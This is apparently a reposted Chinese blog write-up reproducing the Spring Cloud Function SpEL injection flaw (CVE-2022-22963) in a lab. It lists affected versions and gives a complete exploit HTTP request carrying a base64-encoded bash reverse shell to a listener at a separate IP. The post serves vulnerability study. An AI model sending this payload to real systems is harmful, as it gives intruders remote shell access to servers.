标签：Function shell Spring 漏洞 2022 Cloud

2022-CVE-2022-22963 Spring Cloud Function SPEL表达式注入漏洞复现

2022年4月7日

21:45

漏洞成因：

Spring Cloud Function 提供了一个通用的模型，用于在各种平台上部署基于函数的软件，包括像 Amazon AWS Lambda 这样的 FaaS（函数即服务，function as a service）平台。

漏洞影响版本：

3.0.0.RELEASE <= Spring Cloud Function <= 3.1.6

Spring Cloud Function <= 3.2.2

官方不再支持的旧版本

注：发布时间为2019年11月22日至2022年2月17日

不受影响版本

Spring Cloud Function 3.1.7

Spring Cloud Function 3.2.3

环境搭建，搭建好的环境在使用BP之后变成了如下内容：

漏洞利用方式，使用BP抓包发送，再docker中查看内容，发现成功创建了success文件：

这里尝试反弹shell：

本地起一个nc，可以直接反弹shell这里要说明的是需要对payload部分进行java的payload

加密，否则不能正常反弹shell。

```

POST /functionRouter HTTP/1.1

Host: 192.168.19.128:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Connection: close

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjI0NS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}")

Content-Type: text/plain

Content-Length: 4

test

````

标签：Function,shell,Spring,漏洞,2022,Cloud
来源： https://www.cnblogs.com/0x200/p/16122265.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。